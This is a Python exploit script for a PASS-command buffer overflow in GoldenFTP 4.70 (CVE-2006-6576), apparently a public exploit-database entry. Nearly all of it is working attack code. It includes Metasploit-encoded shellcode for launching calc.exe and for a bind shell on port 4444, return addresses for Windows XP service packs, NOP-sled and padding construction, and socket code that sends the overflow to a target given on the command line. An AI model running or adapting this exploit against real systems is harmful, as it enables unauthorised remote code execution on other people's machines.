#!/usr/bin/python # # Exploit Title: GoldenFTP 4.70 PASS overflow exploit (v2.5) # Date: July 8, 2011 # Author: Joff Thyer (jsthyer@gmail.com) # Software Link: http://www.goldenftpserver.com/ # Version: 4.70 # Tested on: WinXP-SP0/SP2/SP3 # CVE: 2006-6576 # # based on exploit by: # Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg) # # You must make sure that the "Show new connections" option is enabled # in order for this exploit to work. # # Notes: # Specifying the IP source address is used in the calculation of the # overflow buffer offset. It is important that the source address # be specified correctly. # import socket import sys from subprocess import Popen, PIPE import re import time # Metasploit # ./msfpayload windows/exec CMD=calc.exe r | ./msfencode -b '\x00\x0a\x0d' -c 3 # 281 bytes calc = \ "\xda\xd8\xbf\xbd\xe6\x2a\x25\xd9\x74\x24\xf4\x5d\x2b\xc9" +\ "\xb1\x40\x31\x7d\x19\x03\x7d\x19\x83\xc5\x04\x5f\x13\xf0" +\ "\xfc\x25\x7d\x71\xce\xb6\xa7\x0e\x14\xbc\x03\xc4\x9d\x8d" +\ "\x8d\x2b\x4d\xf7\xee\x18\x6b\x84\x32\x9a\x69\xde\x1d\x56" +\ "\x5b\x3c\x2b\x9b\xd7\x9f\x60\x60\x07\x1a\x80\xa2\x81\xae" +\ "\xce\x53\x0c\x41\x2a\x63\xce\xe5\x8c\xb1\x14\x78\x13\x69" +\ "\x5b\xe0\x83\x33\x30\x96\x31\x89\x93\x5f\x95\x5c\xe5\x63" +\ "\x23\x44\xfa\xe4\xe4\xbc\x75\x83\xb8\x5e\xa3\x1f\x86\x37" +\ "\xc8\xf4\x89\xab\x9d\x6e\x65\xac\x65\xfc\x7b\xe9\x86\xe6" +\ "\x8f\x25\x93\x03\xd4\x1d\x7f\x73\x91\xc4\x68\x67\x62\x59" +\ "\xe0\x5f\x51\x08\xfb\xd7\x1f\xb6\x5a\x27\xe9\x35\x61\x3e" +\ "\xf8\x4c\xac\x19\x43\x47\x2b\x13\x92\x9e\x1a\xed\xfd\x45" +\ "\x98\x34\x2a\x83\xb4\x84\x2e\xa0\x67\x24\x44\x5b\x32\x0b" +\ "\xbf\x5b\x7a\x9f\xa6\xc8\xd7\xaf\x04\xb9\xa2\x53\x5f\xfd" +\ "\x6f\x5b\x32\x77\xb2\x5b\xec\x53\xa1\x12\x29\x88\x5d\x0f" +\ "\x27\x92\x8b\xca\x63\x38\x4d\x1b\xd2\x26\x0e\xf8\xdf\xf4" +\ "\xef\x8f\x14\x63\xf2\x81\x9e\x60\xb0\xc6\xbe\x97\x1e\x27" +\ "\x32\x8f\x88\x29\x3e\xa4\xbe\xd6\x45\xaa\x70\xcd\x8a\xf6" +\ "\xcd\xa0\x15\x5b\x4b\x73\xde\x3c\xa6\x33\x7d\xa5\xa9\xda" +\ "\x0b\xdf\xc3\xd9\xe9\x81\x5a\xbb\x77\x47\x45\x75\xf9\x5f" +\ "\x88" # Metasploit # ./msfpayload windows/exec CMD=windows/shell_bind_tcp r | ./msfencode -b '\x00\x0a\x0d' -c3 # 422 bytes cmdshell = \ "\xd9\xce\xba\xd6\x6f\x98\xda\xd9\x74\x24\xf4\x5f\x33\xc9" +\ "\xb1\x63\x31\x57\x1a\x03\x57\x1a\x83\xef\xfc\xe2\x23\xd5" +\ "\x9d\x94\x67\x5c\x47\xea\xae\xd5\x53\x1f\x0e\x3f\x55\x6e" +\ "\xf3\x0e\x33\x83\x08\x27\xa9\x20\xe5\x75\x83\xa5\xb5\x66" +\ "\x03\x32\x7d\xe2\xf5\xfa\x35\x4c\x0f\x9b\x44\x05\x5b\x98" +\ "\x24\x7d\xf0\xc3\xb6\xa2\x68\x9c\x42\xed\x08\x82\xfe\xbb" +\ "\x7e\xcf\x76\x76\x97\x38\xeb\xb1\x98\xd6\x51\x8b\xca\xae" +\ "\xea\x2b\x72\x86\x3b\x67\x6a\x9f\x5d\xf2\x4c\xb8\x23\x10" +\ "\x95\xd3\x01\x41\x09\x36\x93\x41\xaa\xb5\x84\xd9\x35\xb0" +\ "\x44\x13\xc0\x38\x6b\xab\x1a\x8c\xb7\xec\x30\x7a\x4a\x73" +\ "\xe5\xf1\x7e\x7e\xaf\x66\xa1\x85\x53\xea\x1a\xd7\x0b\x9a" +\ "\x9e\xf0\x04\x63\xe0\x57\xf6\x6a\x88\xb1\xef\xe0\x4a\x78" +\ "\x63\xdb\xcf\xe6\xde\xcf\xe9\x2c\x94\x5f\xef\x28\x2a\xdc" +\ "\xcd\x7a\xb2\x13\x88\xb1\x8d\x40\xcf\x0c\xf9\x52\x2f\xbc" +\ "\xd4\x34\xad\xb0\x45\xfb\xe2\xa3\xab\xa7\x46\xf6\x83\x38" +\ "\xe0\x36\x75\x7a\x6f\x96\xb3\x4f\xbe\xb9\x17\xbd\xea\x0e" +\ "\xf9\x10\x62\x2e\x91\x69\x28\xeb\xe6\x07\x23\x0f\xf6\x26" +\ "\x4a\xec\xba\xd8\x74\xba\xe6\x38\xb3\x56\x13\xf1\x8d\x70" +\ "\x98\xc9\x60\xcf\x9c\xf5\x1f\x8f\x8f\x04\x6c\x61\x63\x25" +\ "\x87\x89\x1d\x58\x4f\x18\xca\xcb\x11\x03\x24\x6b\xa6\xbd" +\ "\x47\x90\x43\xc5\x9f\x3f\xc8\x64\x3a\xcc\x69\xc7\x9c\x2d" +\ "\x19\xc1\x67\xfa\x07\xcb\xd7\x92\x83\x23\x50\xdf\xa2\xd8" +\ "\x08\xa8\xec\x43\xbb\xda\x10\xc2\x0b\x30\xb7\xdd\xbd\x33" +\ "\x6a\x18\x98\x1e\xc1\x5e\x77\xeb\xe8\x21\x4e\x18\x60\x6f" +\ "\x60\x5c\x99\xb6\x7e\x28\xdb\xda\x40\xea\x8c\xc7\x5c\x70" +\ "\x7f\xd1\x61\xaf\x42\x25\x8d\xec\xb9\xde\x5f\x40\xa2\xa2" +\ "\xe2\x39\x6f\x85\x54\xd3\xa0\xef\x4c\x08\x23\xb5\x88\x85" +\ "\xc0\xfc\xd2\x50\x68\x5b\x93\x33\x8a\x6e\xf8\x4d\x79\xa8" +\ "\x29\x56\x39\xee\x4f\xd2\x49\x48\x4e\x0e\x1c\x8a\xd5\xa6" +\ "\xd0\x94\xfb\xda\x22\x3d\xf4\x22\xe7\x54\xff\xa2\x05\xc4" +\ "\x8c\xc7" if len(sys.argv) < 5: print "[-]Usage: %s " % sys.argv[0] print "\tshellcode = (calc|shell)" print "\tplatform = (sp0|sp2|sp3)" print "\tExample: ./gftp-sploit.py 1.2.1.2 5.6.5.4 calc sp2" sys.exit(0) srcaddr = sys.argv[1] target = sys.argv[2] shellcode = sys.argv[3] platform = sys.argv[4] # which payload? buf = calc if shellcode == "calc": buf = calc elif shellcode == "shell": buf = cmdshell # address of JMP ESI in Kernel32.dll if platform == "sp0": jmpesi = "\x7b\x15\xe8\x77" elif platform == "sp2": jmpesi = "\xc3\x72\x85\x7c" elif platform == "sp3": jmpesi = "\x0b\xda\x82\x7c" shortjmp = "\x90\x90\x90\x90\xeb\x20\n" nopsled = "\x90" * 60 padding = "A" * (533 - len(srcaddr + buf + nopsled)) payload = nopsled + buf + padding + jmpesi print "\ [+] Golden FTP PASS Exploit\n\ [+] Version 2.5, July 8 2011\n\ [+] Author: Joff Thyer (jsthyer@gmail.com)\n\ [+] 'Show new connections' must be enabled in GoldenFTP in order\n\ [+] for this exploit to succeed!\n\ [+] Connecting: "+target s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((target,21)) except: print "[-] Connection to "+target+" failed!" sys.exit(0) print "[+] Sending payload, length = " + `len(payload)` s.send(shortjmp); s.send("USER anonymous\n") s.send("PASS " + payload + "\n") s.recv(1024) print "[+] Sleeping 2 secs..." time.sleep(2) s.close() if shellcode == "shell" and srcaddr == target: p = Popen(["netstat","-na"],stdout=PIPE,shell=False) netstat = p.stdout.read() shellok = re.search("TCP\s*0\.0\.0\.0:4444.*LISTENING",netstat) if shellok: print "[+] "+shellok.group(0) print "[+] Done." sys.exit(0)